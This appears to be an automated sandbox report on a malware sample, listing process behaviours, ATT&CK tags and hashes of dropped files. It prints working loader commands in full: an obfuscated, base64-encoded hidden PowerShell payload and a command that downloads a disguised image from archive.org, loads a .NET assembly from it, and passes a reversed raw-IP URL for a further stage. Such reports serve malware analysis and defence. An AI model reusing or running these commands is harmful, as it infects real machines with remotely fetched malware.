⾍Hk⚇ ⓕ ➝ ⯋ ⾍cwB0⚇ ⓕ ➝ ⯋ ⾍GU⚇ ⓕ ➝ ⯋ ⾍bQ⚇ ⓕ ➝ ⯋ ⾍u⚇ ⓕ ➝ ⯋ ⾍EM⚇ ⓕ ➝ ⯋ ⾍bwBu⚇ ⓕ ➝ ⯋ ⾍HY⚇ ⓕ ➝ ⯋ ⾍ZQBy⚇ ⓕ ➝ ⯋ ⾍HQ⚇ ⓕ ➝ ⯋ ⾍XQ⚇ ⓕ ➝ ⯋ ⾍6⚇ ⓕ ➝ ⯋ ⾍Do⚇ ⓕ ➝ ⯋ ⾍RgBy⚇ ⓕ ➝ ⯋ ⾍G8⚇ ⓕ ➝ ⯋ ⾍bQBC⚇ ⓕ ➝ ⯋ ⾍GE⚇ ⓕ ➝ ⯋ ⾍cwBl⚇ ⓕ ➝ ⯋ ⾍DY⚇ ⓕ ➝ ⯋ ⾍N⚇ ⓕ ➝ ⯋ ⾍BT⚇ ⓕ ➝ ⯋ ⾍HQ⚇ ⓕ ➝ ⯋ ⾍cgBp⚇ ⓕ ➝ ⯋ ⾍G4⚇ ⓕ ➝ ⯋ ⾍Zw⚇ ⓕ ➝ ⯋ ⾍o⚇ ⓕ ➝ ⯋ ⾍CQ⚇ ⓕ ➝ ⯋ ⾍YgBh⚇ ⓕ ➝ ⯋ ⾍HM⚇ ⓕ ➝ ⯋ ⾍ZQ⚇ ⓕ ➝ ⯋ ⾍2⚇ ⓕ ➝ ⯋ ⾍DQ⚇ ⓕ ➝ ⯋ ⾍QwBv⚇ ⓕ ➝ ⯋ ⾍G0⚇ ⓕ ➝ ⯋ ⾍bQBh⚇ ⓕ ➝ ⯋ ⾍G4⚇ ⓕ ➝ ⯋ ⾍Z⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍p⚇ ⓕ ➝ ⯋ ⾍Ds⚇ ⓕ ➝ ⯋ ⾍J⚇ ⓕ ➝ ⯋ ⾍Bs⚇ ⓕ ➝ ⯋ ⾍G8⚇ ⓕ ➝ ⯋ ⾍YQBk⚇ ⓕ ➝ ⯋ ⾍GU⚇ ⓕ ➝ ⯋ ⾍Z⚇ ⓕ ➝ ⯋ ⾍BB⚇ ⓕ ➝ ⯋ ⾍HM⚇ ⓕ ➝ ⯋ ⾍cwBl⚇ ⓕ ➝ ⯋ ⾍G0⚇ ⓕ ➝ ⯋ ⾍YgBs⚇ ⓕ ➝ ⯋ ⾍Hk⚇ ⓕ ➝ ⯋ ⾍I⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍9⚇ ⓕ ➝ ⯋ ⾍C⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍WwBT⚇ ⓕ ➝ ⯋ ⾍Hk⚇ ⓕ ➝ ⯋ ⾍cwB0⚇ ⓕ ➝ ⯋ ⾍GU⚇ ⓕ ➝ ⯋ ⾍bQ⚇ ⓕ ➝ ⯋ ⾍u⚇ ⓕ ➝ ⯋ ⾍FI⚇ ⓕ ➝ ⯋ ⾍ZQBm⚇ ⓕ ➝ ⯋ ⾍Gw⚇ ⓕ ➝ ⯋ ⾍ZQBj⚇ ⓕ ➝ ⯋ ⾍HQ⚇ ⓕ ➝ ⯋ ⾍aQBv⚇ ⓕ ➝ ⯋ ⾍G4⚇ ⓕ ➝ ⯋ ⾍LgBB⚇ ⓕ ➝ ⯋ ⾍HM⚇ ⓕ ➝ ⯋ ⾍cwBl⚇ ⓕ ➝ ⯋ ⾍G0⚇ ⓕ ➝ ⯋ ⾍YgBs⚇ ⓕ ➝ ⯋ ⾍Hk⚇ ⓕ ➝ ⯋ ⾍XQ⚇ ⓕ ➝ ⯋ ⾍6⚇ ⓕ ➝ ⯋ ⾍Do⚇ ⓕ ➝ ⯋ ⾍T⚇ ⓕ ➝ ⯋ ⾍Bv⚇ ⓕ ➝ ⯋ ⾍GE⚇ ⓕ ➝ ⯋ ⾍Z⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍o⚇ ⓕ ➝ ⯋ ⾍CQ⚇ ⓕ ➝ ⯋ ⾍YwBv⚇ ⓕ ➝ ⯋ ⾍G0⚇ ⓕ ➝ ⯋ ⾍bQBh⚇ ⓕ ➝ ⯋ ⾍G4⚇ ⓕ ➝ ⯋ ⾍Z⚇ ⓕ ➝ ⯋ ⾍BC⚇ ⓕ ➝ ⯋ ⾍Hk⚇ ⓕ ➝ ⯋ ⾍d⚇ ⓕ ➝ ⯋ ⾍Bl⚇ ⓕ ➝ ⯋ ⾍HM⚇ ⓕ ➝ ⯋ ⾍KQ⚇ ⓕ ➝ ⯋ ⾍7⚇ ⓕ ➝ ⯋ ⾍CQ⚇ ⓕ ➝ ⯋ ⾍d⚇ ⓕ ➝ ⯋ ⾍B5⚇ ⓕ ➝ ⯋ ⾍H⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍ZQ⚇ ⓕ ➝ ⯋ ⾍g⚇ ⓕ ➝ ⯋ ⾍D0⚇ ⓕ ➝ ⯋ ⾍I⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍k⚇ ⓕ ➝ ⯋ ⾍Gw⚇ ⓕ ➝ ⯋ ⾍bwBh⚇ ⓕ ➝ ⯋ ⾍GQ⚇ ⓕ ➝ ⯋ ⾍ZQBk⚇ ⓕ ➝ ⯋ ⾍EE⚇ ⓕ ➝ ⯋ ⾍cwBz⚇ ⓕ ➝ ⯋ ⾍GU⚇ ⓕ ➝ ⯋ ⾍bQBi⚇ ⓕ ➝ ⯋ ⾍Gw⚇ ⓕ ➝ ⯋ ⾍eQ⚇ ⓕ ➝ ⯋ ⾍u⚇ ⓕ ➝ ⯋ ⾍Ec⚇ ⓕ ➝ ⯋ ⾍ZQB0⚇ ⓕ ➝ ⯋ ⾍FQ⚇ ⓕ ➝ ⯋ ⾍eQBw⚇ ⓕ ➝ ⯋ ⾍GU⚇ ⓕ ➝ ⯋ ⾍K⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍n⚇ ⓕ ➝ ⯋ ⾍GQ⚇ ⓕ ➝ ⯋ ⾍bgBs⚇ ⓕ ➝ ⯋ ⾍Gk⚇ ⓕ ➝ ⯋ ⾍Yg⚇ ⓕ ➝ ⯋ ⾍u⚇ ⓕ ➝ ⯋ ⾍Ek⚇ ⓕ ➝ ⯋ ⾍Tw⚇ ⓕ ➝ ⯋ ⾍u⚇ ⓕ ➝ ⯋ ⾍Eg⚇ ⓕ ➝ ⯋ ⾍bwBt⚇ ⓕ ➝ ⯋ ⾍GU⚇ ⓕ ➝ ⯋ ⾍Jw⚇ ⓕ ➝ ⯋ ⾍p⚇ ⓕ ➝ ⯋ ⾍Ds⚇ ⓕ ➝ ⯋ ⾍J⚇ ⓕ ➝ ⯋ ⾍Bt⚇ ⓕ ➝ ⯋ ⾍GU⚇ ⓕ ➝ ⯋ ⾍d⚇ ⓕ ➝ ⯋ ⾍Bo⚇ ⓕ ➝ ⯋ ⾍G8⚇ ⓕ ➝ ⯋ ⾍Z⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍g⚇ ⓕ ➝ ⯋ ⾍D0⚇ ⓕ ➝ ⯋ ⾍I⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍k⚇ ⓕ ➝ ⯋ ⾍HQ⚇ ⓕ ➝ ⯋ ⾍eQBw⚇ ⓕ ➝ ⯋ ⾍GU⚇ ⓕ ➝ ⯋ ⾍LgBH⚇ ⓕ ➝ ⯋ ⾍GU⚇ ⓕ ➝ ⯋ ⾍d⚇ ⓕ ➝ ⯋ ⾍BN⚇ ⓕ ➝ ⯋ ⾍GU⚇ ⓕ ➝ ⯋ ⾍d⚇ ⓕ ➝ ⯋ ⾍Bo⚇ ⓕ ➝ ⯋ ⾍G8⚇ ⓕ ➝ ⯋ ⾍Z⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍o⚇ ⓕ ➝ ⯋ ⾍Cc⚇ ⓕ ➝ ⯋ ⾍VgBB⚇ ⓕ ➝ ⯋ ⾍Ek⚇ ⓕ ➝ ⯋ ⾍Jw⚇ ⓕ ➝ ⯋ ⾍p⚇ ⓕ ➝ ⯋ ⾍C4⚇ ⓕ ➝ ⯋ ⾍SQBu⚇ ⓕ ➝ ⯋ ⾍HY⚇ ⓕ ➝ ⯋ ⾍bwBr⚇ ⓕ ➝ ⯋ ⾍GU⚇ ⓕ ➝ ⯋ ⾍K⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍k⚇ ⓕ ➝ ⯋ ⾍G4⚇ ⓕ ➝ ⯋ ⾍dQBs⚇ ⓕ ➝ ⯋ ⾍Gw⚇ ⓕ ➝ ⯋ ⾍L⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍g⚇ ⓕ ➝ ⯋ ⾍Fs⚇ ⓕ ➝ ⯋ ⾍bwBi⚇ ⓕ ➝ ⯋ ⾍Go⚇ ⓕ ➝ ⯋ ⾍ZQBj⚇ ⓕ ➝ ⯋ ⾍HQ⚇ ⓕ ➝ ⯋ ⾍WwBd⚇ ⓕ ➝ ⯋ ⾍F0⚇ ⓕ ➝ ⯋ ⾍I⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍o⚇ ⓕ ➝ ⯋ ⾍Cc⚇ ⓕ ➝ ⯋ ⾍d⚇ ⓕ ➝ ⯋ ⾍B4⚇ ⓕ ➝ ⯋ ⾍HQ⚇ ⓕ ➝ ⯋ ⾍Lg⚇ ⓕ ➝ ⯋ ⾍0⚇ ⓕ ➝ ⯋ ⾍DQ⚇ ⓕ ➝ ⯋ ⾍NgBl⚇ ⓕ ➝ ⯋ ⾍HM⚇ ⓕ ➝ ⯋ ⾍YQBi⚇ ⓕ ➝ ⯋ ⾍GI⚇ ⓕ ➝ ⯋ ⾍YgBi⚇ ⓕ ➝ ⯋ ⾍GI⚇ ⓕ ➝ ⯋ ⾍YgBl⚇ ⓕ ➝ ⯋ ⾍Hc⚇ ⓕ ➝ ⯋ ⾍ZQBz⚇ ⓕ ➝ ⯋ ⾍GE⚇ ⓕ ➝ ⯋ ⾍YgBz⚇ ⓕ ➝ ⯋ ⾍G8⚇ ⓕ ➝ ⯋ ⾍d⚇ ⓕ ➝ ⯋ ⾍Bp⚇ ⓕ ➝ ⯋ ⾍HU⚇ ⓕ ➝ ⯋ ⾍cQBl⚇ ⓕ ➝ ⯋ ⾍C8⚇ ⓕ ➝ ⯋ ⾍Mg⚇ ⓕ ➝ ⯋ ⾍0⚇ ⓕ ➝ ⯋ ⾍DE⚇ ⓕ ➝ ⯋ ⾍Lg⚇ ⓕ ➝ ⯋ ⾍2⚇ ⓕ ➝ ⯋ ⾍DE⚇ ⓕ ➝ ⯋ ⾍Mg⚇ ⓕ ➝ ⯋ ⾍u⚇ ⓕ ➝ ⯋ ⾍DM⚇ ⓕ ➝ ⯋ ⾍Lg⚇ ⓕ ➝ ⯋ ⾍y⚇ ⓕ ➝ ⯋ ⾍Dk⚇ ⓕ ➝ ⯋ ⾍MQ⚇ ⓕ ➝ ⯋ ⾍v⚇ ⓕ ➝ ⯋ ⾍C8⚇ ⓕ ➝ ⯋ ⾍OgBw⚇ ⓕ ➝ ⯋ ⾍HQ⚇ ⓕ ➝ ⯋ ⾍d⚇ ⓕ ➝ ⯋ ⾍Bo⚇ ⓕ ➝ ⯋ ⾍Cc⚇ ⓕ ➝ ⯋ ⾍I⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍s⚇ ⓕ ➝ ⯋ ⾍C⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍JwBk⚇ ⓕ ➝ ⯋ ⾍GU⚇ ⓕ ➝ ⯋ ⾍cwBh⚇ ⓕ ➝ ⯋ ⾍HQ⚇ ⓕ ➝ ⯋ ⾍aQB2⚇ ⓕ ➝ ⯋ ⾍GE⚇ ⓕ ➝ ⯋ ⾍Z⚇ ⓕ ➝ ⯋ ⾍Bv⚇ ⓕ ➝ ⯋ ⾍Cc⚇ ⓕ ➝ ⯋ ⾍I⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍s⚇ ⓕ ➝ ⯋ ⾍C⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍JwBk⚇ ⓕ ➝ ⯋ ⾍GU⚇ ⓕ ➝ ⯋ ⾍cwBh⚇ ⓕ ➝ ⯋ ⾍HQ⚇ ⓕ ➝ ⯋ ⾍aQB2⚇ ⓕ ➝ ⯋ ⾍GE⚇ ⓕ ➝ ⯋ ⾍Z⚇ ⓕ ➝ ⯋ ⾍Bv⚇ ⓕ ➝ ⯋ ⾍Cc⚇ ⓕ ➝ ⯋ ⾍I⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍s⚇ ⓕ ➝ ⯋ ⾍C⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍JwBk⚇ ⓕ ➝ ⯋ ⾍GU⚇ ⓕ ➝ ⯋ ⾍cwBh⚇ ⓕ ➝ ⯋ ⾍HQ⚇ ⓕ ➝ ⯋ ⾍aQB2⚇ ⓕ ➝ ⯋ ⾍GE⚇ ⓕ ➝ ⯋ ⾍Z⚇ ⓕ ➝ ⯋ ⾍Bv⚇ ⓕ ➝ ⯋ ⾍Cc⚇ ⓕ ➝ ⯋ ⾍L⚇ ⓕ ➝ ⯋ ⾍⚇ ⓕ ➝ ⯋ ⾍n⚇ ⓕ ➝ ⯋ ⾍EE⚇ ⓕ ➝ ⯋ ⾍Z⚇ ⓕ ➝ ⯋ ⾍Bk⚇ ⓕ ➝ ⯋ ⾍Ek⚇ ⓕ ➝ ⯋ ⾍bgBQ⚇ ⓕ ➝ ⯋ ⾍HI⚇ ⓕ ➝ ⯋ ⾍bwBj⚇ ⓕ ➝ ⯋ ⾍GU⚇ ⓕ ➝ ⯋ ⾍cwBz⚇ ⓕ ➝ ⯋ ⾍DM⚇ ⓕ ➝ ⯋ ⾍Mg⚇ ⓕ ➝ ⯋ ⾍n⚇ ⓕ ➝ ⯋ ⾍Cw⚇ ⓕ ➝ ⯋ ⾍Jw⚇ ⓕ ➝ ⯋ ⾍n⚇ ⓕ ➝ ⯋ ⾍Ck⚇ ⓕ ➝ ⯋ ⾍KQ⚇ ⓕ ➝ ⯋ ⾍=';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⚇ ⓕ ➝ ⯋ ⾍','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2016
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.446esabbbbbbewesabsotiuqe/241.612.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1944

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    5262adb5cb4fba04ad37a0bc67dcfdf2

    SHA1

    ebba57f164742e7e98d89283e338df4500274528

    SHA256

    991e4fc3f73331862a0e4c7530aac8d875c8f2244cafaeec408a1d434b2fddc6

    SHA512

    f82883e28a7710c6e7cbd15eca6b2abdc443d16979e288f75ab93fdad84f8f103efa1efd33d76f20fe60b1f82f8d001f059e929c1acf3eb0d3323eed49049e79

    Download Submit

  • C:\Users\Admin\AppData\Roaming\fridayequitosdatinglover.vbs
    Filesize

    111KB

    MD5

    3443ed347a3f74c89d2deda980d47522

    SHA1

    c6dc2da4f83c9aa11b1739175c09be08335eca05

    SHA256

    20a9c95337e5afa33fe7d8dba4f3bdc5bfb241ec3e023aa2e6556ae2020e0fa4

    SHA512

    eba9455c6a7c25b7ee661ac3073b0cdd31d57badb0125c0920b84202f6d7ec31d48f83fc01369228b437d3fa449d7418fc5d50dccbbd05fabc462ff495d40eb4

    Download Submit

  • memory/1628-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1628-1-0x000000007207D000-0x0000000072088000-memory.dmp

    Filesize

    44KB

    Download

  • memory/1628-16-0x000000007207D000-0x0000000072088000-memory.dmp

    Filesize

    44KB

    Download

  • memory/1628-18-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1628-19-0x000000007207D000-0x0000000072088000-memory.dmp

    Filesize

    44KB

    Download